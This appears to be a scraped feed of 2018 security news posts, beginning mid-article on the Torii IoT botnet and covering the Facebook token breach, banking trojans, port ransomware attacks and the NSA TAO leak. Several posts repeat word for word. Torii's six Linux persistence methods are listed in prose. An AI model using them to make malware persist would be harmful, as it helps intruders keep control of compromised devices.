“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

    1. Automatic execution via injected code into ~\.bashrc
    2. Automatic execution via “@reboot” clause in crontab
    3. Automatic execution as a “System Daemon” service via systemd
    4. Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
    5. Automatic execution via modification of the SELinux Policy Management
    6. Automatic execution via /etc/inittab

Torii infects devices with Telnet exposed and protected by weak credentials, it first executes a sophisticated script used to determines the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC with active polling in an endless loop, waiting for commands to execute. Once executed the command, the bot will reply with the results of its execution.

The samples analyzed by the expert were communicating with a command-and-control server that is located in Arizona.

At the time of the analysis, Telnet is the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli who noticed similarities to the Persirai.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but  by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs are reported in the analysis published by Avast.

Pierluigi Paganini

(Security Affairs – Torii IoT botnet, hacking)

The post Torii botnet, probably the most sophisticated IoT botnet of ever appeared first on Security Affairs.

Facebook hacked – 50 Million Users’ Data exposed in the security breach

Facebook hacked – Attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of 50 Million Users.

Facebook hacked, this is news that is rapidly spreading across the Internet. A few hours ago, Facebook announced that an attack on its computer network exposed the personal information of roughly 50 million users.

The giant of social networks has discovered the security breach this week, the attackers have exploited a bug in the “View as” features to steal access tokens of the users and take over their accounts.

Facebook has identified the flaw exploited in the attack and already fixed it, it immediately launched an investigation and reported the incident to law enforcement.

In a blog post, Facebook’s Guy Rosen, VP of Product Management explained that the attackers exploited a vulnerability associated with Facebook’s “View As” feature that allowed them to steal Facebook access tokens. These tokens could then be used to take over people’s accounts.

“On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts.”   stated Guy Rosen, Facebook VP of Product Management.

“Our investigation is still in its early stages. But it’s clear that attackers exploited a vulnerability in Facebook’s code that impacted “View As”, a feature that lets people see what their own profile looks like to someone else. This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts.”

Facebook disabled the “View As” feature in response to the incident, the company reset the security tokens for the 50 million impacted accounts, and as a precautionary measure, reset them for other 40 million accounts.

“Second, we have reset the access tokens of the almost 50 million accounts we know were affected to protect their security. We’re also taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year. As a result, around 90 million people will now have to log back in to Facebook, or any of their apps that use Facebook Login. After they have logged back in, people will get a notification at the top of their News Feed explaining what happened.” continues Guy Rosen.

“Third, we’re temporarily turning off the “View As” feature while we conduct a thorough security review.”

Facebook hacked

Facebook revealed that the bug exploited by the attackers was introduced with a change to their video uploading feature made in July 2017.

The tech giant said it did not know the source of the attack or identity of the attackers.

“We’re taking it really seriously,” Mark Zuckerberg, the company’s chief executive, said in a conference call with reporters. “We have a major security effort at the company that hardens all of our surfaces.” He added: “I’m glad we found this. But it definitely is an issue that this happened in the first place.”

The company will provide more information once the investigation will be completed.

Pierluigi Paganini

(Security Affairs – Facebook hacked, data breach)

The post Facebook hacked – 50 Million Users’ Data exposed in the security breach appeared first on Security Affairs.

QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks

The QRecorder app in the Play Store impersonating a phone call and voice recording utility embedded a banking malware used to target European banks.

Security experts from ESET have discovered a malicious app in the official Google Play Store that impersonates a phone call and voice recording utility, it was hiding a banking malware used to target customers of European banks.

The malware, tracked as Razdel, is a variant of BankBot mobile banking Trojan.

According to the Czech Television, the malicious code targets apps from Raiffeisen Bank, as well as ČSOB and Česká Spořitelna.

Czech Police shared the identikit and pictures from ATM security camera of a money mule withdrawing money from one of the Prague ATM from affected victims accounts.

The malware was hidden in the QRecorder app and according to the ESET security researcher Lukas Stefanko, the banking Trojan was downloaded and installed by over 10,000.

QRecorder app malware

The malicious QRecorder app is able to intercept SMS two-factor authentication (2FA) messages and ask for permission to display overlays on top of legitimate bank apps to control what the user sees on his device.

To avoid raising suspicions, the malicious application correctly implements the audio recording features.

Stefanko discovered that the threat actor behind the operator sends commands to the app within 24 hours from installation, for example, it scans the device for specific banking apps.

Attacker leverages Google Firebase messages to communicate with compromised devices. If one of the targeted apps is installed on the device, before downloading payload it would request the user to activate Accessibility service and using this permission it would automatically download and execute the malicious payload.

Once the malicious payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched by the user, the malware displays overlay to steal credentials.

“Before downloading payload it would request user to activate Accessibility service and using this permission it would automatically download, install and open malicious payload.” wrote Stefanko.

“Once payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched it would create similar like looking activity that overlays official app demanding credentials.”

According to official statement of Czech police, QRecorder infected five victims in Czech Republic stealing a total of over 78,000 Euros from their accounts.

The analysis of the code revealed that the QRecorder malware is able to monitor a large number of banks, including Air Bank, Equa, ING, Bawag, Fio, Oberbank, and Bank Austria.

One of the most interesting aspects of this malware is that the threat actor created different payloads for each targeted bank.

QRecorder app was removed from the official Android store, below a video that shows how the app operates.

Pierluigi Paganini

(Security Affairs – QRecorder app, malware)

The post QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks appeared first on Security Affairs.

Cybersecurity Research Shows Risks Continue to Rise

Research is at the center of the cybersecurity industry, with a steady stream of reports that highlight weaknesses in cyber defenses and potential solutions. Last week was a particularly busy

The post Cybersecurity Research Shows Risks Continue to Rise appeared first on The Cyber Security Place.

Security Affairs: Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona

Port of San Diego suffered a ransomware-based attack, a few days after the Port of Barcelona was hit by a cyber attack that caused several problems.

A few days ago the Port of Barcelona was hit by a cyber attack that caused several problems to the critical infrastructure, now another major international port was targeted by attackers.

The second attack was reported on September 25 and hit the Port of San Diego, in the United States.

Several computers at the Port of San Diego were infected with a ransomware, the incident impacted the processing park permits and record requests, along with other operations.

According to the officials, the ordinary operations, including ship access and public safety, have not been affected by the cyber attack.

“The Port of San Diego has experienced a serious cybersecurity incident that has disrupted the agency’s information technology systems. The Port first received reports of the disruption on Tuesday, September 25, 2018. The Port has mobilized a team of industry experts and local, regional, state and federal partners to minimize impacts and restore system functionality, with priority placed on public safety-related systems. The Harbor Police Department has alternative systems and procedures in place to minimize impacts to public safety.”  said Randa Coniglio, Chief Executive Officer for the Port of San Diego in a  statement published on the site of the port the day after the attack.

“Additionally, we have reported this disruption to the California Office of Emergency Services (Cal OES) and the County of San Diego Office of Emergency Services. Port employees are currently at work but have limited functionality, which may have temporary impacts on service to the public, especially in the areas of park permits, public records requests, and business services. No further information is available at this time; updates will be provided as information is available,” said Port of San Diego CEO Randa Coniglio.”

Port of San Diego hack

The operator at the port promptly reported to the California Office of Emergency Services and the County of San Diego Office of Emergency Services. Feds and the Department of Homeland Security launched an investigation into the attack.

In July the China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyber attack, according to COSCO a “local network breakdown” disrupted some systems in the United States.

Clearly, the series of “disruptive” cyber-attacks reported by three ports raises the discussion about the level of security of this kind of infrastructure.

Port authorities are privileged targets for hackers and they are often easy to attack.

The fear is that a threat actor is focusing his efforts against port worldwide.

Pierluigi Paganini

(Security Affairs – Pangu iOS 12 jailbreak, hacking)

The post Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona appeared first on Security Affairs.



Security Affairs

Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona

Port of San Diego suffered a ransomware-based attack, a few days after the Port of Barcelona was hit by a cyber attack that caused several problems.

A few days ago the Port of Barcelona was hit by a cyber attack that caused several problems to the critical infrastructure, now another major international port was targeted by attackers.

The second attack was reported on September 25 and hit the Port of San Diego, in the United States.

Several computers at the Port of San Diego were infected with a ransomware, the incident impacted the processing park permits and record requests, along with other operations.

According to the officials, the ordinary operations, including ship access and public safety, have not been affected by the cyber attack.

“The Port of San Diego has experienced a serious cybersecurity incident that has disrupted the agency’s information technology systems. The Port first received reports of the disruption on Tuesday, September 25, 2018. The Port has mobilized a team of industry experts and local, regional, state and federal partners to minimize impacts and restore system functionality, with priority placed on public safety-related systems. The Harbor Police Department has alternative systems and procedures in place to minimize impacts to public safety.”  said Randa Coniglio, Chief Executive Officer for the Port of San Diego in a  statement published on the site of the port the day after the attack.

“Additionally, we have reported this disruption to the California Office of Emergency Services (Cal OES) and the County of San Diego Office of Emergency Services. Port employees are currently at work but have limited functionality, which may have temporary impacts on service to the public, especially in the areas of park permits, public records requests, and business services. No further information is available at this time; updates will be provided as information is available,” said Port of San Diego CEO Randa Coniglio.”

Port of San Diego hack

The operator at the port promptly reported to the California Office of Emergency Services and the County of San Diego Office of Emergency Services. Feds and the Department of Homeland Security launched an investigation into the attack.

In July the China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyber attack, according to COSCO a “local network breakdown” disrupted some systems in the United States.

Clearly, the series of “disruptive” cyber-attacks reported by three ports raises the discussion about the level of security of this kind of infrastructure.

Port authorities are privileged targets for hackers and they are often easy to attack.

The fear is that a threat actor is focusing his efforts against port worldwide.

Pierluigi Paganini

(Security Affairs – Pangu iOS 12 jailbreak, hacking)

The post Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona appeared first on Security Affairs.

Fancy Bear’s VPNfilter malware is back with 7 new modules

By Waqas

Cisco’s Talos researchers have identified that Russia’s VPNfilter is way more dangerous than it is believed to be. The malware, which prompted the FBI to urge people to reboot their internet routers, contains seven additional third-stage modules that are infecting countless global networking devices since 2016. The infected devices are mainly located in Ukraine as […]

This is a post from HackRead.com Read the original post: Fancy Bear’s VPNfilter malware is back with 7 new modules

Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak

Former NSA TAO hacker was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky.

A former member of the NSA’s Tailored Access Operations hacking team was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky software.

The former NSA hacker is Nghia Hoang Pho (68), he served the US intelligence for 10 years as a member of the NSA’s elite Tailored Access Operations hacking unit.

The man pleaded guilty in December 2017 to one count of willful retention of classified national defense information.

The Vietnam-born American citizen, who was living in Ellicott City, Maryland, was charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker’s personal computer and were sent back to Kaspersky’s server for further analysis.

Kaspersky Lab, published a detailed report on how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

According to the prosecutors, between 2010 and 2015, the former NSA hacker had taken home with him TAO materials, including exploits and hacking tools.

According to the telemetry logs collected by the Russian firm, the staffer temporary switched off the antivirus protection on the PC, and infected his personal computer with a spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the former NSA TAO member’s PC, sometime later the employee disabled the Kaspersky software to execute the activation-key generator.

Then the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky published a second report that sheds the light on the investigation conducted by the firm on the NSA-linked Equation Group APT.

Kaspersky has begun running searches in its databases since June 2014, 6 months prior to the year the alleged hack of its antivirus, for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE number of false positives.

The analysis revealed the presence of a specific signature that fired a large number of times in a short time span on just one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). This is the beginning of the analysis of the system that was found containing not only this archive but many files both common and unknown that indicated this was probably a person related to the malware development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of the Microsoft Office 2013, but the .ISO was containing the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two month its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

The security firm explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

NSA TAO hacker

According to the Wall Street Journal, the intrusion of the Pho’s computer led to the Russians obtaining information on how the NSA TAO using hack into foreign computer networks.

“As a result of his actions, Pho compromised some of our country’s most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost,” declared US Attorney Robert Hur.

The US Government banned using Kaspersky anti-virus software on government networks and blamed the company of working for the Russian intelligence.

Kaspersky has repeatedly denied any ties to the Russian intelligence and announced the launch of a transparency initiative that involves giving partners access to the source code of its solutions.

Pierluigi Paganini

(Security Affairs – Kaspersky Ban, NSA TAO)

The post Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak appeared first on Security Affairs.

Security Affairs: Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak

Former NSA TAO hacker was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky.

A former member of the NSA’s Tailored Access Operations hacking team was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky software.

The former NSA hacker is Nghia Hoang Pho (68), he served the US intelligence for 10 years as a member of the NSA’s elite Tailored Access Operations hacking unit.

The man pleaded guilty in December 2017 to one count of willful retention of classified national defense information.

The Vietnam-born American citizen, who was living in Ellicott City, Maryland, was charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker’s personal computer and were sent back to Kaspersky’s server for further analysis.

Kaspersky Lab, published a detailed report on how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

According to the prosecutors, between 2010 and 2015, the former NSA hacker had taken home with him TAO materials, including exploits and hacking tools.

According to the telemetry logs collected by the Russian firm, the staffer temporary switched off the antivirus protection on the PC, and infected his personal computer with a spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the former NSA TAO member’s PC, sometime later the employee disabled the Kaspersky software to execute the activation-key generator.

Then the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky published a second report that sheds the light on the investigation conducted by the firm on the NSA-linked Equation Group APT.

Kaspersky has begun running searches in its databases since June 2014, 6 months prior to the year the alleged hack of its antivirus, for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE number of false positives.

The analysis revealed the presence of a specific signature that fired a large number of times in a short time span on just one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). This is the beginning of the analysis of the system that was found containing not only this archive but many files both common and unknown that indicated this was probably a person related to the malware development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of the Microsoft Office 2013, but the .ISO was containing the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two month its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

The security firm explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

NSA TAO hacker

According to the Wall Street Journal, the intrusion of the Pho’s computer led to the Russians obtaining information on how the NSA TAO using hack into foreign computer networks.

“As a result of his actions, Pho compromised some of our country’s most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost,” declared US Attorney Robert Hur.

The US Government banned using Kaspersky anti-virus software on government networks and blamed the company of working for the Russian intelligence.

Kaspersky has repeatedly denied any ties to the Russian intelligence and announced the launch of a transparency initiative that involves giving partners access to the source code of its solutions.

Pierluigi Paganini

(Security Affairs – Kaspersky Ban, NSA TAO)

The post Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak appeared first on Security Affairs.



Security Affairs

Crooks leverages Kodi Media Player add-ons for malware distribution

Security experts have spotted a Monero cryptomining campaign that abused Kodi add-ons to deliver miner that target both Linux and Windows systems.

Crooks are abusing Kodi Media Player to distribute malware, researchers from ESET recently spotted a cryptomining campaign that compromised about over 5,000 computers.

Kodi users can add new functionality by installing add-ons that are available on the official Kodi repository and in several third-party stores

An attacker can deliver malicious code by compromising the add-ons that are automatically updated by the Kodi media player.

According to ESET researchers, attackers can target Kodi to spread malware using three different mechanisms:

  1. They add the URL of a malicious repository to their Kodi installation so as to download some add-ons. The malicious add-on is then installed whenever they update their Kodi add-ons.
  2. They install a ready-made Kodi build that includes the URL of a malicious repository. The malicious add-on is then installed whenever they update their Kodi add-ons.
  3. They install a ready-made Kodi build that contains a malicious add-on but no link to a repository for updates. They are initially compromised, though receive no further updates to the malicious add-on. However, if the cryptominer is installed, it will persist and receive updates.

The malicious code distributed in this campaign is able to compromise both Windows and Linux platforms. It is a multi-stage malware that implements measures to make it hard for analysts to trace the malicious code back to the add-on.

Attackers added the malicious add-on to the XvMBC, Bubbles, and Gaia repositories.

Most of the infections were observed in the United States, Israel, Greece, the United Kingdom, and the Netherlands.

Kodi

“After victims add the malicious repository to their Kodi installation, the malicious repository serves an add-on named script.module.simplejson – a name matching that of a legitimate add-on used by many other add-ons.  However, while other repositories only have the script.module.simplejson add-on at version 3.4.0, the malicious repository serves this add-on with version number 3.4.1.” continues the repository.

“Since Kodi relies on version numbers for update detection, all users with the Auto Update feature enabled (which is a common default setting) will automatically receive script.module.simplejson version 3.4.1 from the malicious repository.”

Although the main repositories used in this campaign are now either closed or cleaned, many devices are still running the malicious add-ons to mine Monero.

Researchers from ESET, revealed that crooks behind the campaign have already mined about $6,700 worth of Monero.

“According to these statistics of the malware authors’ Monero wallet, provided by Nanopool, a minimum of 4774 victims are affected by the malware at the time of writing, and have generated 62,57 XMR (about 5700 EUR or 6700 USD) as of this writing.” concludes the report.

Further details, including the IoCs, are available in the report.

Pierluigi Paganini

(Security Affairs – Kodi, malware)

The post Crooks leverages Kodi Media Player add-ons for malware distribution appeared first on Security Affairs.

SHEIN Data breach affected 6.42 million users

Another fashion retailer suffered a data breach, the victim is SHEIN that announces the security breach affected 6.42 million customers.

The retailer hired a forensic cybersecurity firm as well as an international law firm to investigate the security breach.

SHEIN is now notifying affected users and it is urging them to change the password for their account.

Hacker accessed customers personal information, including email addresses and encrypted password credentials of customers who visited the online store.

There are no technical details about the incident, the company only confirmed to have found a malware on its servers and has promptly removed it.

” In addition, SHEIN servers have been scanned and malware found on the servers has been removed. “Back door” entry points to the servers opened by the attackers have been closed and removed.” continues the press release.

The post SHEIN Data breach affected 6.42 million users appeared first on Security Affairs.

Security newsround: September 2018

We round up interesting research and reporting about security developments from around the web. This month: the devastation from NotPetya, a sound idea for authentication, help with NIST and cutting-edge security analysis.

The shipping news

If the truly wise learn from the experiences of others, then there are lessons galore from Maersk’s ransomware infection. You know, the one that cost the world’s largest shipping company $300 million. Thanks to an eye-watering account in Wired, you can vicariously experience the eye of a storm during a crippling ransomware outbreak.

The story details Maersk’s troubles during the NotPetya outbreak in 2017, aka “the most devastating cyberattack in history”. Weighing in at more than 6,000 words, it’s a meaty read. The excellent in-the-trenches reporting from Andy Greenberg offers plenty of ‘what-if’ scenarios that security and risk professionals can use for developing response plans.

Listen to this: a wearable solution to 2FA trouble?

Build a better mousetrap and the world will beat a path to your door. In this case, the trap in question is authentication. Researchers at the University of Alabama have developed a wearable device that uses two-factor authentication to foil attackers that are remote or in close proximity. It requires minimal effort on the part of users, who don’t even need to install browser plugins. CSO reports that “the browser would play back a short random code encoded into human speech when a user attempts to login”.

The University’s own summary describes it as “a complete re-design of the sound-based TFA systems to thwart both remote and proximity attacks”, while still being easy to use. Sophos notes that usability has been a sticking point when it comes to 2FA adoption. It cited one 2016 study showing that 28 per cent of users don’t use 2FA, and 60 per cent of those that do only do it because someone makes them.” The original research paper is here.

Plotting a secure path through the NIST

This year, the National Institute of Standards and Technology updated its 2014 framework for improving the security of critical infrastructure. (Here’s the framework as a free PDF.) Now, Mukul Kumar and Anupam Sahai of Cavirin Systems have written a guide to help security professionals turn the framework theory into security reality for their needs. They outline five high-level steps for following the NIST advice, with detailed explanations for each step.

Researchers look to security’s future at Usenix 2018

The 27th Usenix security symposium took place in August, and it often hosts interesting sessions giving a glimpse of where security might be heading. This year was no exception, with the largest event in the conference’s history. Researchers from around the world presented at the three-day event. As part of their commitment to open access to research, the organisers publish links to all 100 papers at Usenix’s publications page.

There’s no shortage of tantalising titles to choose from. Among our favourites are: You can run, but can you hide? (analysing privacy protection in fitness trackers), The Battle for New York: (a case study of enterprise-level digital threat modelling), and O Single Sign-Off, Where Art Thou? (which analyses single sign-on account hijacking).

Possibly the best is Harvard professor James Mickens’ 50-minute keynote called “Q: Why Do Keynote Speakers Keep Suggesting That Improving Security Is Possible? A: Because Keynote Speakers Make Bad Life Decisions and Are Poor Role Models”.

Things we liked

Europol warns that GDPR fears could lead breached companies to do deals with cybercriminals to avoid regulatory fines. MORE

The world is changing. Time to change how security professionals and CISOs approach their roles, argues Joseph DiBiase. MORE

Is two-factor authentication the security panacea some claim it is? Stuart Schechter argues caution before making the leap: “All security measures have trade-offs”, he warns. MORE

Patch, and patch often. This piece asks why does it take so long to install security updates? MORE

As the UK data protection regulator imposes a £500,000 fine on Equifax, the Register describes the company’s security failings as “the gift that keeps on giving”. MORE

 

The post Security newsround: September 2018 appeared first on BH Consulting.

Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems.

Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems.

Adwind is a remote access Trojan (RAT), the samples used in the recently discovered campaign are Adwind 3.0 RAT and leverage the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel.

The campaign was uncovered at the end of August, attackers mainly targeted users in Turkey (75%), experts noticed that other victims were located in Germany, but likely members of the Turkish community.

The spam campaign uncovered by the experts leveraged on malicious documents that were written in Turkish.

“This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.” reads the analysis published by Cisco Talos.

The experts observed at least two different droppers in this campaign that use both the .csv or .xlt files that are opened by default by Microsoft Excel.

Both of them would leverage a new variant of the DDE code injection attack, although this technique is well-known, the variant used in this campaign is still undetected.

The dropper file can have more than 30 different file extensions some of them are not opened by Excel by default, however, the attackers can use a script launching Excel with a file with one of these extensions as a parameter.

“Formats like CSV doesn’t have a predefined header, thus it can contain any kind of data at the beginning. Having random data like in the samples we found my trick the anti-virus into skip the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.” continues the report.

Adwind campaign

Excel will display differed warnings to the user regarding the execution of code, the first related to the execution of a corrupted file, the second one notifies the user that the document will execute the application “CMD.exe.”

If the user accepts all the warnings, the application is executed on the system.

Talos pointed out that attackers aim at injecting code that would create and execute a Visual Basic Script that uses the bitasdmin Microsoft tool to download or upload jobs and monitor their progress, to get the final payload in the form of a Java archive.

The Java code is packed with the demo version of the “Allatori Obfuscator commercial packer, version 4.7.

The final payload is a sample the Adwind RAT v3.0.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations.” Talos concludes.

“This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,” 

Further details, including IoCs, are reported in the analysis published by Talos.

Pierluigi Paganini

(Security Affairs – Adwind RAT, malware-as-a-service)

The post Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems appeared first on Security Affairs.

Malware hits Freelancers at Fiverr and Freelancer.com

By Waqas

Unfortunately, unsuspected freelancers are falling for the malware scam.  Fiverr and Freelancer.com are two of the most popular websites for freelancers and clients looking for skilled professionals. Currently, both sites have millions of registered users from hundreds of countries and that makes them lucrative targets for cybercriminals. Recently, security researchers at MalwareHunterTeam have discovered a new piece of […]

This is a post from HackRead.com Read the original post: Malware hits Freelancers at Fiverr and Freelancer.com

Security Affairs: Security Affairs newsletter Round 181 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Cyber attack took offline flight display screens at the Bristol Airport
Feedify cloud service architecture compromised by MageCart crime gang
Researcher devised a new CSS & HTML attack that causes iPhone reboot or freezes Macs
EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS
Google Android team found high severity flaw in Honeywell Android-based handheld computers
Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia
One year later BlueBorne disclosure, over 2 Billion devices are still vulnerable
A flaw in Alpine Linux could allow executing arbitrary code
Amazon is investigating allegations that its staff is selling customer data
Cracked Windows installations are serially infected with EternalBlue exploit code
New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms
NSO mobile Pegasus Spyware used in operations in 45 countries
Access to over 3,000 compromised sites sold on Russian black marketplace MagBo
Dissecting the first Gafgyt bot implementing the Non Un-Packable NUP technique
Evolution of threat landscape for IoT devices – H1 2018
Flaw in Western Digital My Cloud exposes the content to hackers
Mirai authors avoid the jail by helping US authorities in other investigations
Adobe issued a critical out-of-band patch to address CVE-2018-12848 Acrobat flaw
Magecart cybercrime group stole customers credit cards from Newegg electronics retailer
Sustes Malware: CPU for Monero
US State Department confirms data breach to unclassified email system
Cisco fixes Remote Code Execution flaws in Webex Network Recording Player
Expert disclosed an unpatched zero-day flaw in all supported versions of Microsoft Windows
Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange
Homebuyers Being Targeted by Money Transfer Scam
DanaBot banking Trojan evolves and now targets European countries
Ngrok Mining Botnet
Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 181 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 181 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Cyber attack took offline flight display screens at the Bristol Airport
Feedify cloud service architecture compromised by MageCart crime gang
Researcher devised a new CSS & HTML attack that causes iPhone reboot or freezes Macs
EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS
Google Android team found high severity flaw in Honeywell Android-based handheld computers
Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia
One year later BlueBorne disclosure, over 2 Billion devices are still vulnerable
A flaw in Alpine Linux could allow executing arbitrary code
Amazon is investigating allegations that its staff is selling customer data
Cracked Windows installations are serially infected with EternalBlue exploit code
New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms
NSO mobile Pegasus Spyware used in operations in 45 countries
Access to over 3,000 compromised sites sold on Russian black marketplace MagBo
Dissecting the first Gafgyt bot implementing the Non Un-Packable NUP technique
Evolution of threat landscape for IoT devices – H1 2018
Flaw in Western Digital My Cloud exposes the content to hackers
Mirai authors avoid the jail by helping US authorities in other investigations
Adobe issued a critical out-of-band patch to address CVE-2018-12848 Acrobat flaw
Magecart cybercrime group stole customers credit cards from Newegg electronics retailer
Sustes Malware: CPU for Monero
US State Department confirms data breach to unclassified email system
Cisco fixes Remote Code Execution flaws in Webex Network Recording Player
Expert disclosed an unpatched zero-day flaw in all supported versions of Microsoft Windows
Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange
Homebuyers Being Targeted by Money Transfer Scam
DanaBot banking Trojan evolves and now targets European countries
Ngrok Mining Botnet
Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 181 – News of the week appeared first on Security Affairs.

New Virobot malware combines ransomware and botnet capabilities

Security experts from Trend Micro discovered a new malware tracked as Virobot that combines ransomware and botnet capabilities.

Virobot encrypts files on infected machines and is also implements spam botnet abilities and leverages it target other systems.

Virobot was first spotted on September 17, 2018, experts pointed out that it is not associated with any known ransomware families.

The analysis of the infection chain revealed that once Virobot is downloaded to a machine, it will check the presence of specific registry keys (machine GUID and product key) to determine if the files on the system should be encrypted.

Then it leverages a cryptographic Random Number Generator to generate the encryption and decryption key, then send it along with data related to the infected machine to the command and control (C&C) server via POST.

The malicious code targets the most popular file types, including .txt, .docx, .xlsx, .pptx, .jpg, .png, .csv, .sql, .mdb, .php, .asp, .xml, .psd, .odt, and .html.

The experts highlighted a curiosity about the ransom note and ransom screen displayed by the malware, even if it is currently targeting users in the US, the ransom note is written in French:

Virobot

Virobot also implements a keylogging feature, collected keystrokes, it is also able to download additional files from the C&C server.

“Virobot also has a keylogging feature and connects back to its C&C server to send logged key strokes from an infected machine. Once connected to the C&C, it may download files – possibly another malware binary – and execute it using PowerShell.” reads the analysis published by Trend Micro.

